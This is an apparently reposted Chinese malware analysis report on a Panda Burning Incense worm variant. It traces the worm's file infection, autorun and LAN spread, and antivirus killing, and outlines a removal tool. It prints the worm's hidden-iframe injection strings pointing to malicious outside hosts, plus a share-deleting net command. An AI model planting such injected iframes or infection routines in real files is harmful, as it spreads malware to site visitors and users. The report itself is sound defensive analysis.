熊猫烧香变种病毒分析
熊貓燒香變種病毒分析分析報告
| 作者 | yusakul |
| 時間 | 2018-07-13 |
| 平臺 | Win7-32 |
1.樣本概況
1.1 樣本信息
| 所屬家族 | 熊貓燒香 |
| 樣本名稱 | 0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768 |
| 樣本類型 | PE |
| 樣本大小 | 98816 bytes |
| MD5值 | b8f8e75c9e77743a61bbea9ccbcffd5d |
| SHA1值 | 188fc8fc580c0ea4bf8a8900a3d36471823c8923 |
| CRC32 | E63D45D3 |
| SHA256 | 0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768 |
| SSDeep | 3072:apAja0pSLwYqK6hVZ7N4bdq4a53YKCOTpc:a2ja0pShqK65ZOq4QYK1m |
1.2 病毒行為
| 修改資源管理器(explorer)的文件夾的隱藏屬性 |
| 將進程的內存屬性修改為可執行或可寫 |
| 想系統服務發送控制碼 |
| 刪除服務 |
| 對指定運行的進程感興趣 |
1.2 測試環境及工具
| VMware? Workstation 14 Pro | 分析環境win7_x32 |
| 火絨劍 | 行為監控 |
| IDA pro 7.0 | 靜態分析 |
| Ollydbg | 動態分析 |
1.3 分析目標
1.3.1 查看PE文件
1. kernel32.dll文件導入函數
可以看出導入的這些函數都是進程、文件相關的API函數。
2. Advapi32.dll
Advapi32.dll是一個高級API應用程序接口。包括了函數與對象的安全性,注冊表的操控以及事件日志相關的API函數。
這些函數主要包括三類:注冊表相關函數,進程權限修改函數,服務相關函數。
3. Mpr.dll
Mpr.dll是windows操作系統網絡通信相關模塊。
Wsock.dll windows socket相關API接口。
WNetAddConnection2A創建一個網絡資源的鏈接。
URLDownloadToFileA從指定的URL讀取內容寫入到文件中。
由上述的導入表分析可知,該病毒程序的主要功能包括:文件讀寫、注冊表修改、進程權限修改,網絡鏈接,URL等。
1.3.2 火絨劍監控 - 文件操作
1. 創建自我備份在根目錄
2. 創建并釋放隱藏文件Desktop_.ini
3. 自我復制
1.3.2火絨劍監控 - 注冊表操作
1. 無效“顯示所有文件和文件夾”功能
2. 刪除殺毒軟件自啟項
3. 修改文件
使用notepad++查看被修改的文件,被新添加了一行:
<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>將該網址提交微步在線分析如下
1.3.3 火絨劍監控 - 網絡操作
1. 掃描并嘗試連接局域網腦內139、445端口
因為本次分析是在虛擬機封閉分析,所以沒有連接其他主機,猜測此病毒連接成功后,會向其他主機發送自己,達到傳播目的。
2. 嘗試連接外網IP,并發送數據包
數據內容如下:
1.3.4火絨劍監控 - 進程操作
1. 遍歷系統進程并啟動自釋放文件
2.具體行為分析
2.1 主要行為
2.1.1 惡意程序對用戶造成的危害
1. 替換程序圖標
2. 隱藏文件
3. 有目錄創建Desktop_.ini文件,內容為當前時間(2018-7-11)。
2.2 惡意代碼分析
2.2.1 惡意代碼樹結構圖
2.2.1 惡意代碼IDA結構圖
兩次對比字符串是否相等,不相等則退出, 驗證完成后有三個主要的惡意行為函數
2.2.2 主要功能函數sub_40819C – 復制
此函數主要功能為自我復制到系統目錄并執行復制體。
1.查找系統目錄下是否存在Desktop.ini文件,有則刪除
2.檢測病毒spc0lsv.exe
病毒會通過檢查文件路徑、病毒感染標志來確定進當前病毒屬于以下三種情況的哪一種情況。
分別進程本身屬于原始病毒文件、被感染的可執行文件、以及偽裝目標進程三種情況。
(1)原始病毒文件
拷貝自身到
~/system32/driver/目錄,重命名為spc0lsv.exe并運行,然后結束當前進程。
(2)當前程序時是被感染的可執行文件
1)在當前目錄釋放被感染的原始文件
2)刪除系統目錄下spo0lav
3)將創建病毒程序拷貝到系統目錄,并執行。
(3)當前運行路徑為系統根目錄,說明當前是在偽裝成系統程序狀態下運行的,沒有敏感操作。
2.2.3 主要功能函數sub_40D18C – 感染
此函數為感染傳播函數。
該函數由3個主要函數,第一個執行感染功能,第二個實現自我復制,第三個局域網傳播自身。
感染文件線程
(1)遍歷文件夾,判斷是否為文件夾,判斷目錄下是否存在Desktop_.ini文件。
判斷是否存在Desktop_.ini
(2)若目錄下存在Desktop_.ini,獲取當前系統時間,對比Desktop_.ini中的時間,是同一天則表示此目錄已被感染,跳過此目錄。
若不同則在此目錄下生成新的Desktop_.ini,寫入本地時間。
(3)刪除GHO備份
(4)感染PE文件 – 感染方式1
將病毒內容直接覆蓋到要感染程序,感染目標文件后綴類型有:EXE、SCR、PIF、COM。
f_HackWay1:
(5)感染PE文件 – 感染方式2
網頁感染:感染目標文件后綴類型有:htm, html, asp, php, jsp, aspx。
主要將字符串(<iframe src=http://www.krvkr.com/worm.htm width=0
height=0></iframe>)添加到文件末尾。
f_HackWays:
2. 自我復制 - 時鐘周期6s
檢索各個磁盤的根目錄是否存在setup.exe和autorun.inf文件,存在則刪除它們。
將自身復制到 盤符:\setup.exe
遍歷磁盤, 創建“盤符:\autorun.inf”文件。
設置setup.exe文件屬性為 <系統,隱藏>
設置autorun.inf文件屬性為 <系統,隱藏>,同時將setup.exe設置為自啟
3. 局域網傳播
2.2.4 主要功能函數sub_40D088 – 其他
此函數主要功能為通過修改注冊表實現自我保護,連接網站實現自我更新等功能。
該函數中設置了6個時鐘周期,定時執行不同的功能。
TimerFunc_1(1s)
(1)提升進程權限
(2)遍歷窗口名, 向指定窗口名發送QUIT消息, 并結束指定進程,大多為殺毒防護軟件。
(3)掃描進程,如果有檢測到以下進程則結束它,下圖為部分截圖:
(4)修改注冊表,設置spo0lsv.exe開機啟動,設置文件(夾)隱藏
TimerFunc_2(1200s)
通過URL地址更新
TimerFunc_3(10s)
(1)通過URL地址更新
(2)刪除網絡共享:net share ipc$ /del 刪除ipc$共享
(3)關閉當前時鐘
4. TimerFunc_4(6s)
將殺毒軟件服務停止,并刪除注冊表啟動項。
TimerFunc_5(10s)
字符串被加密操作過,根據特征猜測可能是網址,似乎是對一些網址做了操作。
TimerFunc_6(180s)
仍然是從某個網址上下載文件,應該不是關鍵操作。
3.解決方案
3.1 病毒行為
病毒行為1:病毒本身創建了名為“spo01sv.exe”的進程,該進程文件的路徑為“C:\WINDOWS\system32\drivers\spo01sv.exe”。
病毒行為2:在注冊表KCU\Software\Microsoft\Windows\CurrentVersio
n\Run”中創建“svcshare”,用于在開機時啟動位于“C:\WINDOWS\system3
2\drivers\spo0lsv.exe”的病毒程序。
病毒行為3:修改注冊表,使得隱藏文件無法通過普通的設置進行顯示,該位置為HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Adva
nced\Folder\Hidden\SHOWALL,病毒將CheckedValue的鍵值設置為了0。
病毒行為4:將自身拷貝到根目錄,并命名為“setup.exe”,同時創建“autorun.inf”用于病毒的啟動,這兩個文件的屬性都是“隱藏”。
病毒行為5:在一些目錄中創建名為“Desktop_.ini”的隱藏文件。
3.2 殺毒工具編寫步驟
3.2.1 終止病毒進程
利用ToolHelpAPI獲得快照句柄,而后再利用Process32First和Process32Next枚舉當前的進程,枚舉的過程當中獲取結構體ProcessEntry32這個結構體里面的相關信息(包括進程名和進程ID);
找到目標進程之后,利用OpenProcess獲取當前的進程句柄,最后再利用TerminateProcess終止病毒進程.
3.2.2. 刪除文件
調用函數Bool DeleteFile (LPCTSTR
lpFilename),把lpFilename設為要指向刪除的文件的文件名的指針即可,可以包含具體路徑。
3.2.3 修復注冊表,刪除啟動啟動項
RegOpenKeyEx()打開目標主鍵,并返回句柄,然后利用RegSetValueEx進行修改鍵值,最后可以利用RegSetValueEx來刪除鍵值,最后利用RegCloseKey來進行關閉。
3.2.3 查殺工具鏈接
我的GitHub·https://github.com/yusakul/PandaKiller
3.2.4 工具截圖
總結
以上是生活随笔為你收集整理的熊猫烧香变种病毒分析的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 用户层CS段描述符信息
- 下一篇: AndroidStudio动态调试sma